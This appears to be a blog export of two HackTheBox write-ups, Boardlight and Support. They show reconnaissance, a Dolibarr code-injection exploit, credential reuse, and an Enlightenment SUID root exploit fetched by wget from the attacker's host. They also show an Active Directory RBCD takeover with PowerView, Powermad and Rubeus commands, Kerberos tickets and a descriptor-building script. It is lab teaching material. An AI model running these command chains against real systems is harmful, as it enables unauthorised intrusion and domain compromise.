Nmap done: 1 IP address (1 host up) scanned in 15.09 seconds Dirbusting # 403 GET 9l 28w 279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter 404 GET 9l 31w 276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter **301 GET 9l 28w 313c http://boardlight.htb/js =\u0026gt; http://boardlight.htb/js/** 301 GET 9l 28w 314c http://boardlight.htb/css =\u0026gt; http://boardlight.htb/css/ 301 GET 9l 28w 317c http://boardlight.htb/images =\u0026gt; http://boardlight.htb/images/ 200 GET 5l 48w 1493c http://boardlight.htb/images/fb.png 200 GET 5l 55w 1797c http://boardlight.htb/images/linkedin.png 200 GET 7l 48w 3995c http://boardlight.htb/images/d-5.png 200 GET 6l 12w 491c http://boardlight.htb/images/user.png 200 GET 5l 14w 1227c http://boardlight.htb/images/insta.png 200 GET 294l 635w 9426c http://boardlight.htb/contact.php 200 GET 3l 10w 667c http://boardlight.htb/images/telephone-white.png **200 GET 294l 633w 9209c http://boardlight.htb/do.php** 404 GET 1l 3w 16c http://boardlight.htb/portfolio.php 200 GET 517l 1053w 15949c http://boardlight.htb/index.php 200 GET 100l 178w 1904c http://boardlight.htb/css/responsive.css 200 GET 5l 23w 1217c http://boardlight.htb/images/location-white.png 200 GET 5l 12w 847c http://boardlight.htb/images/envelope-white.png 200 GET 280l 652w 9100c http://boardlight.htb/about.php 200 GET 6l 52w 1968c http://boardlight.htb/images/twitter.png 200 GET 11l 50w 2892c http://boardlight.htb/images/d-1.png 200 GET 714l 1381w 13685c http://boardlight.htb/css/style.css 200 GET 9l 24w 2405c http://boardlight.htb/images/d-2.png 200 GET 6l 57w 1878c http://boardlight.htb/images/youtube.png 200 GET 348l 2369w 178082c http://boardlight.htb/images/map-img.png 200 GET 536l 2364w 201645c http://boardlight.htb/images/who-img.jpg 200 GET 4437l 10973w 131639c http://boardlight.htb/js/bootstrap.js 200 GET 10038l 19587w 192348c http://boardlight.htb/css/bootstrap.css 200 GET 2l 
1276w 88145c http://boardlight.htb/js/jquery-3.4.1.min.js 200 GET 517l 1053w 15949c http://boardlight.htb/ Subd # wfuzz -u http://board.htb/ -H \u0026#34;Host: FUZZ.board.htb\u0026#34; -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hw 1053 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz\u0026#39;s documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://board.htb/ Total requests: 4989 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== **000000072: 200 149 L 504 W 6360 Ch \u0026#34;crm\u0026#34;** (--hw 1053 hides every response with the same word count as the default site, which is what the dirbusting above showed for /, so only a vhost that serves something different makes it through) Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nlet\u0026#39;s add crm.board.htb to /etc/hosts\ncrm.board.htb # I validated this step using the evidence below before moving forward in the chain.\nRobots.txt for crm # Exploitation # Dolibarr default creds admin:admin # https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253\nlet\u0026#39;s just try this exploit (CVE-2023-30253 is PHP code injection through the Dolibarr website module and needs a valid login, which is why the default admin:admin matters)\njust like that we have our shell\nso mysql is running\nwe find the db creds in the Dolibarr config file (conf/conf.php)\n$dolibarr_main_db_user=\u0026#39;dolibarrowner\u0026#39;; $dolibarr_main_db_pass=\u0026#39;serverfun2$2023!!\u0026#39;; $dolibarr_main_db_type=\u0026#39;mysqli\u0026#39;; using these creds we find this in the db\ndolibarr $2y$10$VevoimSke5Cd1/nX1Ql9Su6RstkTRe7UX1Or.cm8bZo56NjCMJzCm and another admin user, but dolibarr has the last name superadmin and the admin value set to 1, so let\u0026#39;s try cracking this one instead\nwhile that cracks let\u0026#39;s see if we can reuse these creds\nand oh we got access as the user larissa via 
ssh\nwe come across these files\nlet\u0026#39;s check the CVE it\u0026#39;s mentioning\nlarissa@boardlight:/tmp$ wget http://10.10.14.137:8080/exploit.sh -o exploit.sh larissa@boardlight:/tmp$ chmod +x exploit.sh larissa@boardlight:/tmp$ ./exploit.sh ./exploit.sh: line 1: --2026-03-02: command not found ./exploit.sh: line 2: Connecting: command not found ./exploit.sh: line 3: HTTP: command not found ./exploit.sh: line 4: Length:: command not found ./exploit.sh: line 5: Saving: command not found ./exploit.sh: line 7: 0K: command not found ./exploit.sh: line 9: syntax error near unexpected token `(\u0026#39; ./exploit.sh: line 9: `2026-03-02 04:03:52 (1.13 MB/s) - ‘exploit.sh.1’ saved [709/709]\u0026#39; larissa@boardlight:/tmp$ ./exploit.sh.1 -bash: ./exploit.sh.1: Permission denied larissa@boardlight:/tmp$ chmod +x exploit.sh.1 larissa@boardlight:/tmp$ ./exploit.sh.1 CVE-2022-37706 [*] Trying to find the vulnerable SUID file... [*] This may take few seconds... [+] Vulnerable SUID binary found! [+] Trying to pop a root shell! [+] Enjoy the root shell :) mount: /dev/../tmp/: can\u0026#39;t find in /etc/fstab. ## whoami root ## and boom we are done\n(the first attempt failed because wget -o names the log file, not the download; -O is the output option, so exploit.sh held wget\u0026#39;s log and the script itself landed in exploit.sh.1. CVE-2022-37706 is the SUID enlightenment_sys helper bug in Enlightenment, which is why the root shell arrives with a mount error mentioning /dev/../tmp/)\n","date":"1 March 2026","externalUrl":null,"permalink":"/ctf-writeups/boardlight/","section":"CTF Writeups","summary":"","title":"Boardlight","type":"ctf-writeups"},{"content":" Support # Overview # OS: Windows AD IP: 10.129.5.1 Difficulty: Easy Platform: HackTheBox OSCP: Yes Lists: N/A Summary # Analyzed a binary from an anonymous SMB share and found hardcoded creds, enumerated LDAP with them and found a password in a user\u0026#39;s info field, then found that the account sits in a group with GenericAll over the DC and abused that with RBCD.\nLoot # Loot Category Details Usernames ldap, support Passwords nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz, Ironside47pleasure40Watchful Usernames+Passwords ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz, support:Ironside47pleasure40Watchful Hashes Service Versions Enumeration # Nmap # └─$ nmap support.htb -sCV -A -Pn --min-rate=20000 Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-23 05:48 EST Nmap scan report for support.htb (10.129.5.1) Host is up (0.044s latency). 
Not shown: 988 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-02-23 10:48:15Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%) OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016 Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2026-02-23T10:48:30 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required (signing required rules out relaying NTLM to SMB on this box; 5985 is WinRM, which is how the shell comes later) Dirbusting # Nothing Interesting SMB # smbclient -L //support.htb0 -N Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share support-tools Disk support staff tools SYSVOL Disk Logon server share Reconnecting with SMB1 for workgroup listing. 
do_connect: Connection to support.htb0 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available support-tools is the only non-default share, and it lists anonymously, so let\u0026#39;s look through it\n─$ smbclient //10.129.5.1/support-tools -N Try \u0026#34;help\u0026#34; to get a list of possible commands. smb: \\\u0026gt; dir . D 0 Wed Jul 20 13:01:06 2022 .. D 0 Sat May 28 07:18:25 2022 7-ZipPortable_21.07.paf.exe A 2880728 Sat May 28 07:19:19 2022 npp.8.4.1.portable.x64.zip A 5439245 Sat May 28 07:19:55 2022 putty.exe A 1273576 Sat May 28 07:20:06 2022 SysinternalsSuite.zip A 48102161 Sat May 28 07:19:31 2022 UserInfo.exe.zip A 277499 Wed Jul 20 13:01:07 2022 windirstat1_1_2_setup.exe A 79171 Sat May 28 07:20:17 2022 WiresharkPortable64_3.6.5.paf.exe A 44398000 Sat May 28 07:19:43 2022 4026367 blocks of size 4096. 941659 blocks available smb: \\\u0026gt; get SysinternalsSuite.zip we will try grabbing this and checking it out\nthat kept timing out, probably because it is 48 MB, so let\u0026#39;s check UserInfo.exe.zip first (it is the one file that is not a well-known tool and it carries a different date from everything else) and get back to the rest later if we can\nlet me just run this on my Windows machine real quick\nPS C:\\Users\\muqar\\Desktop\\UserInfo.exe\u0026gt; .\\UserInfo.exe -v PS C:\\Users\\muqar\\Desktop\\UserInfo.exe\u0026gt; .\\UserInfo.exe -v find [-] At least one of -first or -last is required. PS C:\\Users\\muqar\\Desktop\\UserInfo.exe\u0026gt; .\\UserInfo.exe -v find -first muqaram [*] LDAP query to use: (givenName=muqaram) [-] Exception: The server is not operational. PS C:\\Users\\muqar\\Desktop\\UserInfo.exe\u0026gt; .\\UserInfo.exe -v user -first muqaram Unable to parse command \u0026#39;user\u0026#39; reason: Required option \u0026#39;-username\u0026#39; not found! 
Usage: UserInfo.exe [options] [commands] Options: -v|--verbose Verbose output Commands: find Find a user user Get information about a user So it builds an LDAP query and tries to bind to a server that is not reachable from my machine, which means it must carry bind credentials somewhere; let\u0026#39;s analyze it further with dnSpy\nwe find this: the LDAP bind password is stored in the binary in encoded form, next to the routine that decodes it\nthere is a script to decode it as well, so let\u0026#39;s run it and see what we get\nand BOOM we have our decrypted password\nnvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz Let\u0026#39;s use it to authenticate as the ldap user\nLDAP # ┌──(kali㉿kali)-[~/Desktop/Boxes/support] └─$ crackmapexec smb support.htb0 -u ldap -p \u0026#39;nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz\u0026#39; SMB support.htb0 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False) SMB support.htb0 445 DC [+] support.htb\\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz nice, we have working creds for the ldap user\nlet\u0026#39;s start up BloodHound\nBloodhound Analysis # bloodhound-python -c ALL -u ldap -p \u0026#39;nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz\u0026#39; -d support.htb -ns 10.10.11.174 let me examine this data now\nthe Shared Support Accounts group seems to have GenericAll over dc.support.htb, that is pretty interesting, let\u0026#39;s mark it as high value\nnothing good from here\nlet\u0026#39;s do LDAP enum and check the info field (a classic place for helpdesk notes and passwords)\nLet\u0026#39;s use Apache Directory Studio\nwe find these users\nthe support user seems to have a password in the info field, let\u0026#39;s try to connect with it\nPort 80 # Exploitation # Should have used this heading earlier\nlet\u0026#39;s get in now (Evil-WinRM over 5985 as support)\nwe apparently have GenericAll over the DC, inherited through the Shared Support Accounts group\nRBCD # BloodHound mentions that due to the GenericAll privilege we can perform a Resource Based Constrained Delegation (RBCD) attack and escalate our privileges.\nIn a nutshell, through a Resource Based Constrained Delegation attack we can add a computer under our control to the domain; let\u0026rsquo;s call this computer $FAKE-COMP01 , and configure the Domain Controller (DC) to allow $FAKE-COMP01 to act on behalf of it. 
Then, as $FAKE-COMP01, we ask the KDC for a service ticket to the DC on behalf of a highly privileged user such as Administrator (S4U2self followed by S4U2proxy, which Rubeus does in a single s4u command). Once that ticket is issued we can Pass the Ticket (PtT) and authenticate as that user to the service we chose, giving us control over the entire domain.\nThe attack relies on three prerequisites:\nWe need a shell or code execution as a domain user that belongs to the Authenticated Users group. By default any member of this group can add up to 10 computers to the domain.\nThe ms-ds-machineaccountquota attribute needs to be higher than 0. This attribute controls how many computers authenticated domain users can add to the domain (if it is 0, you need some other account with an SPN that you already control).\nOur current user, or a group our user is a member of, needs write access to the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of a domain joined computer (in this case the Domain Controller): GenericAll or GenericWrite give that directly, and WriteDACL lets you grant it to yourself first.\nUploading the necessary scripts\nC:\\Users\\support\\Documents\u0026gt; upload ../../Tools/ACTIVEDIRECTORY/Rubeus.exe C:\\Users\\support\\Documents\u0026gt; upload ../../Tools/ACTIVEDIRECTORY/PowerView.ps1 C:\\Users\\support\\Documents\u0026gt; upload ../../Tools/ACTIVEDIRECTORY/Powermad.ps1 . .\\PowerView.ps1 . 
.\\Powermad.ps1 I’ll need to know the administrator on DC, which Bloodhound tells me is administrator@support.htb:\nI’ll verify that users can add machines to the domain (ms-ds-machineaccountquota is still at its default of 10):\nI’ll also need to make sure there’s a 2012 or newer DC in the environment, since RBCD only exists from Server 2012 on:\nEvil-WinRM* PS C:\\programdata\u0026gt; Get-DomainController | select name,osversion | fl Name : dc.support.htb OSVersion : Windows Server 2022 Standard 2022 Standard is great.\nFinally, I’ll want to check that msds-allowedtoactonbehalfofotheridentity is empty, so nothing legitimate gets overwritten:\nEvil-WinRM* PS C:\\programdata\u0026gt; Get-DomainComputer DC | select name,msds-allowedtoactonbehalfofotheridentity | fl name : DC msds-allowedtoactonbehalfofotheridentity : It is.\nNew-MachineAccount -MachineAccount 0xdfFakeComputer -Password $(ConvertTo-SecureString \u0026#39;0xdf0xdf123\u0026#39; -AsPlainText -Force) $fakesid = Get-DomainComputer 0xdfFakeComputer | select -expand objectsid $fakesid S-1-5-21-1677581083-3380853377-188903654-6101 Now I’ll configure the DC to trust my fake computer to make authorization decisions on its behalf. 
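What actually gets stored in msds-allowedtoactonbehalfofotheridentity is the binary, self-relative form of the O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SID) security descriptor. The Python below is an added example and is not code from this writeup, from PowerView or from Impacket: with nothing but struct it builds the same descriptor from the fake computer SID shown above and decodes a descriptor back into its ACEs, which is the same thing the verification step that follows checks, and is also how a defender would audit the attribute on every computer object for SIDs that should not be there. Assumptions: the SID is the one from this box, the byte layout (20-byte header, owner SID, then the DACL) is my own choice since consumers locate each part through the header offsets anyway, and only plain allow/deny ACEs are decoded (object ACEs carry extra GUID fields before the SID).

```python
import struct

# DS access rights in the order the SDDL string CCDCLCSWRPWPDTLOCRSDRCWDWO lists them
SDDL_RIGHTS = [
    ('CC', 0x00000001), ('DC', 0x00000002), ('LC', 0x00000004), ('SW', 0x00000008),
    ('RP', 0x00000010), ('WP', 0x00000020), ('DT', 0x00000040), ('LO', 0x00000080),
    ('CR', 0x00000100), ('SD', 0x00010000), ('RC', 0x00020000), ('WD', 0x00040000),
    ('WO', 0x00080000),
]
BUILTIN_ADMINS = 'S-1-5-32-544'                 # the BA in O:BA
SE_DACL_PRESENT, SE_SELF_RELATIVE = 0x0004, 0x8000
ACCESS_ALLOWED, ACCESS_DENIED = 0x00, 0x01      # plain ACE types; object ACEs (0x05 and up) differ

def rights_mask(rights):
    # 'CCDCLC...' -> ACCESS_MASK, two letters per right
    table = dict(SDDL_RIGHTS)
    mask = 0
    for i in range(0, len(rights), 2):
        mask |= table[rights[i:i + 2]]
    return mask

def mask_to_rights(mask):
    # inverse of rights_mask, keeping the canonical letter order
    return ''.join(name for name, bit in SDDL_RIGHTS if mask & bit)

def sid_to_bytes(sid):
    # 'S-1-5-21-a-b-c-rid' -> revision, sub-authority count, 48-bit authority (big endian),
    # then each sub-authority as a little-endian uint32
    parts = sid.split('-')
    if parts[0] != 'S' or parts[1] != '1':
        raise ValueError('not a SID string: ' + sid)
    subs = [int(p) for p in parts[3:]]
    return (struct.pack('<BB', 1, len(subs)) + int(parts[2]).to_bytes(6, 'big')
            + struct.pack('<%dI' % len(subs), *subs))

def bytes_to_sid(buf, off=0):
    rev, count = struct.unpack_from('<BB', buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], 'big')
    subs = struct.unpack_from('<%dI' % count, buf, off + 8)
    return 'S-%d-%d-%s' % (rev, authority, '-'.join(str(s) for s in subs))

def build_rbcd_sd(trustee_sid, rights='CCDCLCSWRPWPDTLOCRSDRCWDWO'):
    # self-relative SECURITY_DESCRIPTOR for O:BAD:(A;;<rights>;;;<trustee_sid>)
    # layout chosen here: 20-byte header, owner SID, DACL; readers go by the header offsets
    owner = sid_to_bytes(BUILTIN_ADMINS)
    trustee = sid_to_bytes(trustee_sid)
    ace = struct.pack('<BBHI', ACCESS_ALLOWED, 0, 8 + len(trustee), rights_mask(rights)) + trustee
    acl = struct.pack('<BBHHH', 2, 0, 8 + len(ace), 1, 0) + ace      # ACL_REVISION 2, one ACE
    off_owner = 20
    off_dacl = off_owner + len(owner)
    header = struct.pack('<BBHIIII', 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                         off_owner, 0, 0, off_dacl)                  # no group, no SACL
    return header + owner + acl

def parse_sd(buf):
    # -> (owner_sid, [(ace_type, access_mask, sid), ...]); an unset attribute decodes to (None, [])
    if not buf:
        return None, []
    _, _, control, off_owner, _, _, off_dacl = struct.unpack_from('<BBHIIII', buf, 0)
    owner = bytes_to_sid(buf, off_owner) if off_owner else None
    aces = []
    if control & SE_DACL_PRESENT and off_dacl:
        _, _, _, ace_count, _ = struct.unpack_from('<BBHHH', buf, off_dacl)
        pos = off_dacl + 8
        for _ in range(ace_count):
            ace_type, _, ace_size, mask = struct.unpack_from('<BBHI', buf, pos)
            # the SID sits right after the 8-byte ACE header only for plain allow/deny ACEs
            sid = bytes_to_sid(buf, pos + 8) if ace_type in (ACCESS_ALLOWED, ACCESS_DENIED) else None
            aces.append((ace_type, mask, sid))
            pos += ace_size
    return owner, aces

def trusted_sids(buf):
    # principals allowed to delegate to this computer: the thing to audit on every DC
    return [sid for t, _, sid in parse_sd(buf)[1] if t == ACCESS_ALLOWED]

def to_sddl(buf):
    owner, aces = parse_sd(buf)
    o = 'O:BA' if owner == BUILTIN_ADMINS else 'O:' + str(owner)
    return o + 'D:' + ''.join('(A;;%s;;;%s)' % (mask_to_rights(m), s)
                               for t, m, s in aces if t == ACCESS_ALLOWED)

if __name__ == '__main__':
    sd = build_rbcd_sd('S-1-5-21-1677581083-3380853377-188903654-6101')   # $fakesid from this box
    mask = parse_sd(sd)[1][0][1]
    print(len(sd), 'bytes:', sd.hex())
    print(to_sddl(sd), 'mask=%d (0x%X)' % (mask, mask))
    print('allowed to act on behalf of DC:', trusted_sids(sd))
```

Run as-is it prints the 80-byte descriptor, its SDDL rendering and the access mask 983551 (0xF01FF), which is the AccessMask value PowerView shows in the DACL after the attribute has been set. Given the raw bytes of the attribute pulled from a computer object (for example written out from PowerShell with [IO.File]::WriteAllBytes), trusted_sids() lists every principal allowed to delegate to it; an unset attribute decodes to an empty list, which is the It is empty check above.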
These commands will create an ACL with the fake computer’s SID and assign that to the DC:\n$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList \u0026#34;O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($fakesid))\u0026#34; $SDBytes = New-Object byte[] ($SD.BinaryLength) $SD.GetBinaryForm($SDBytes, 0) Get-DomainComputer DC | Set-DomainObject -Set @{\u0026#39;msds-allowedtoactonbehalfofotheridentity\u0026#39;=$SDBytes} I’ll verify it worked:\n$RawBytes = Get-DomainComputer DC -Properties \u0026#39;msds-allowedtoactonbehalfofotheridentity\u0026#39; | select -expand msds-allowedtoactonbehalfofotheridentity $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0 $Descriptor.DiscretionaryAcl (the DACL should show a single ACE whose SecurityIdentifier is $fakesid and whose AccessMask is 983551, i.e. 0xF01FF, which is what CCDCLCSWRPWPDTLOCRSDRCWDWO expands to; once the box is done, clear the attribute and delete 0xdfFakeComputer again, since both the new computer account and the attribute change are durable, logged changes on the DC) Auth as the Fake Computer\nPull the Hash\n.\\Rubeus.exe hash /password:0xdf0xdf123 /user:0xdfFakeComputer /domain:support.htb rc4_hmac : B1809AB221A7E1F4545BD9E24E49D5F4\n.\\Rubeus.exe s4u /user:0xdfFakeComputer$ /rc4:B1809AB221A7E1F4545BD9E24E49D5F4 /impersonateuser:administrator /msdsspn:cifs/dc.support.htb /ptt *Evil-WinRM* PS C:\\Users\\support\\Documents\u0026gt; .\\Rubeus.exe s4u /user:0xdfFakeComputer$ /rc4:B1809AB221A7E1F4545BD9E24E49D5F4 /impersonateuser:administrator /msdsspn:cifs/dc.support.htb /ptt ______ _ (_____ \\ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \\| ___ | | | |/___) | | \\ \\| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.3.3 [*] Action: S4U [*] Using rc4_hmac hash: B1809AB221A7E1F4545BD9E24E49D5F4 [*] Building AS-REQ (w/ preauth) for: \u0026#39;support.htb\\0xdfFakeComputer$\u0026#39; [*] Using domain controller: ::1:88 [+] TGT request successful! 
[*] base64(ticket.kirbi): doIFvjCCBbqgAwIBBaEDAgEWooIEzTCCBMlhggTFMIIEwaADAgEFoQ0bC1NVUFBPUlQuSFRCoiAwHqAD AgECoRcwFRsGa3JidGd0GwtzdXBwb3J0Lmh0YqOCBIcwggSDoAMCARKhAwIBAqKCBHUEggRxjMdq92Jp 7rYGfC3rg4Ws9H2mvkU03wFygL8YLuwdeSRWjdkd6cCWBoipNMLIQURvbNyOgSMlwV9fJFefIpzWRU7R HtJH0OUj7ULbmuQuxhaYde0wwVW2iudU2U2lgtSpHriPY8mJ9stlq/kc8s+N6WI5PN/R6zdtc+bAiq15 1uXnDtrw6dEwrTzVyEYj4RrWGnfgihpyNGSIjvSD9DffP+ftzFUwdMHKrYRoXvD9uqWlpWwVKcLi3ebe 9t99Ga6NDnqPd61Ly1aK9UtzCDKQSCNafFfM6sHLVvXuOgHH7pyAv544fxgV165M0eO44WRtAPkuo34r dqh+H7rxr0+G1dcEc16TUhjdBxQ/VrNi+M6pb1MnQ0ztnq4Y6R2SZbI37y3cLl33OALHxszfTlPwhkuI KC3EoLQfXXs/pnl+aNyrkMqUEspjlGV7ofphnYDzC978rMltDgnvTaI7UAds8j3PeZLIJuC3zsjEe5oZ RWvjgQx6/74mFWn1aI3lIMk1g6K3i7bwNBvGLt09HYx/cA6nCjTGzZdPpmfXGonBqEXH827FGNlZy2nl pa9QH7Un2a1pKDkSKUl1tQrnWt07+aSbmGTJhDLiN1dwoizvumB/33XWwZ3lL2JPgxk3ct+ou+T4K5R1 u+N7x7M3SHnpF6ADmJTS+uahDH+e1eA/io7mSom5mFBQxsjvhyhcZYy1U7jgB1O+Dt05tkM5tPikYItb ONoXE6lJGz0D6raBN1zDuK3dXbefSpLA2asd4afvvgQBPSWep4ZfchNty9yRbn44cRtoLX6Gl1dHBP/b g2BbmuEPTIsPwt0A5uHIxe0E0f353vcXIDKB3g6BGP7u9hVn4GBTW+QYU8+A6FAfVeV9bEJRqsFnAq80 bQN2VxFNXFmBBcq3E5tIartpPf2+yDuxoyQAJZxHZaqHTw41W3qExfYUwFD+khYHTa5C7XX94SoMlN34 Rx4SqRQu/DvcgKRQW5/4iTkPdkGeSvlvAQiRyik9L1awzO4FiBwWPKz6r+/BCkKG1Su8SeZTKNhz6Dzc 6Aw7RrqaW89iKjJUfeKzzIG/Oxb4NTc/19uLSSv/80Tq5TrVJNPGZpvl/1N9zm9tonzph2Qjy3eCvNAa qxR0xmzX97II0J/P8G73JFgSyyMaJtOjK8JJfQTHE/58/0qYXO+9dvOsYksxyxgpPKEBLtKDfspMLlPJ eoklkUuEUk8JsH041I06tm3qcsExu6XgsEaSck5FipqTItFjh5WF85vhZhZ4Twir8z4lIohj57a43OKb kwA7fUDiG1eWPJR0lXlY7nnmIFbFsjTwpvmVYdtwxRsX6yMGG6K2C531/lBqn6FTPY+0jG/mUkRhdpBH zTRGPP3zuokkUbeL/O7uPfdVNWbVOQH6FSmFDaGn6VvW+hS08plQj1k/9YjzQK7XG3EzMHV7Y98qU86V GmuvuqltEDAYbJhHj7+gE5qyFtobKrwWR7w0oicFFNfiseE8sBnumzPg4oAcF2u4PvJ3o4HcMIHZoAMC AQCigdEEgc59gcswgciggcUwgcIwgb+gGzAZoAMCARehEgQQ+OBkvOYnOKmidbObbW7RI6ENGwtTVVBQ T1JULkhUQqIeMBygAwIBAaEVMBMbETB4ZGZGYWtlQ29tcHV0ZXIkowcDBQBA4QAApREYDzIwMjYwMjI1 MTE0OTI4WqYRGA8yMDI2MDIyNTIxNDkyOFqnERgPMjAyNjAzMDQxMTQ5MjhaqA0bC1NVUFBPUlQuSFRC 
qSAwHqADAgECoRcwFRsGa3JidGd0GwtzdXBwb3J0Lmh0Yg== [*] Action: S4U [*] Building S4U2self request for: \u0026#39;0xdfFakeComputer$@SUPPORT.HTB\u0026#39; [*] Using domain controller: dc.support.htb (::1) [*] Sending S4U2self request to ::1:88 [+] S4U2self success! [*] Got a TGS for \u0026#39;administrator\u0026#39; to \u0026#39;0xdfFakeComputer$@SUPPORT.HTB\u0026#39; [*] base64(ticket.kirbi): doIFtjCCBbKgAwIBBaEDAgEWooIEyzCCBMdhggTDMIIEv6ADAgEFoQ0bC1NVUFBPUlQuSFRCoh4wHKAD AgEBoRUwExsRMHhkZkZha2VDb21wdXRlciSjggSHMIIEg6ADAgEXoQMCAQGiggR1BIIEcZk0rBmQW9bW Xwsn96yPWwvhC6/KCLoMqvP3wLmzhdsgcRYYe0dcEaVrDszeU8XTJKdHUCQQibftJQCM3VnP0cTe1YJL VWKNZe20K6uGVBIAu9C1kmA+tGZx6VpYyDOSZ/G7Lhp/mEXq7oOj6Pe4eoZZaotL0/0/6OrndGn6dXvp hozx+ReGLCMiu4U5HWSsBn460FlqUWHZk0MnwMiD7i68RHlBHmLdkblvL584jSC6OZ7xh7P28+E5KqId iDDMjUFRrm8Nnqz+e/lsXzP14jcvz3QnMlo9vJQ8atrRN9uMp1yhor/ME9Yz5RJAzDJDmbg6LZcBNOQD VbvLkRhvjVpRDQPwhlJHZxzvdpamQ3N4BajqcAcugsCxUlr4yyl50Km74VI2XpoZ5rzNkSjfRjy0rCk0 FAeAgX+3rE0cg2NHQiRCAdGPTZEE+8VY6//iLwFdxzKCTA+RmUrkLbBknPMDDTRS1VslWueE44o0l1+W ZkjMrWs3iGdtdfRhDBsj33/ZfBaXhnzrOjlQPacIJtRvt4NsIDgetu/bwZwengQDwUxUG/QIWczeOLLZ 5ox9A1Wycne9z8+gdUeeR2kcxYMlVgSQH0Xn+M0J2E+CfQzK8CKJV1L5g7u8ZNYZ1k9LERJ9JLrvN4Hg 3rA9iBCgYiCnjW1FpquzCsn+PPRpujJ6fiCChd5U6CVY6WlfIF0I6ZDfWGJ5sPAZC8z+Mi281IG5OE0m u4U4QTgJqTtnTnAflncvJQ7K8eqeYYhkaqIRe/Ah7rSb8D46d4xORYSy/yTpjmWiYfV4fXDfFvt2Kr+9 98JfBHJBuQ/v9dB1Ggisb+dWOakvgSPCXcUPiLjDKnODTY1ZsXF8xlHe8cJMuPH+VZqQGsOtxP9yGdAE lVQOh+/mB/TXLjiuPaLuQS9lI8SD2dOlqFpkRVOUm1xohabuhyR/8cSYW3JfAORqzdPqj3u2LidfbzQj R6ncSk98jYOwtD0zDltWbPC4CRTkgs2FtinfYT+TkhzJhJOhzKlvZFDsM08OcFbNRL7vbpEyeAnd1SQP itc0EtLhI2D+6IRp/9Aa72R+GQxaUSRMAjWxBsNnFV6KSKIGU6gFrakZJFwGmhlbLuUvPt34zpgFeDS/ TGbjz5Zz9ZBwQyV0Jgy2v1Osc76vncYDD+wz9RqkrNKcAZZ5a7H5VyfWT271JuLalWQrZbOw4vptqBGh bp1zRGuBmcG/P3Hdb/oadH9AYFGZ6tqv46ngl/vaahSUKVEh1KGI0b99okjjJEaee2is+B5DGAa8A6Cf cxwgc+5Ikbc4E0J6k2pZxN030Ol/ErUq5y44GpFRfHXEGb5v+a2OdqLPfqB4mrgM5BvCr+xdRrzJX6FD 
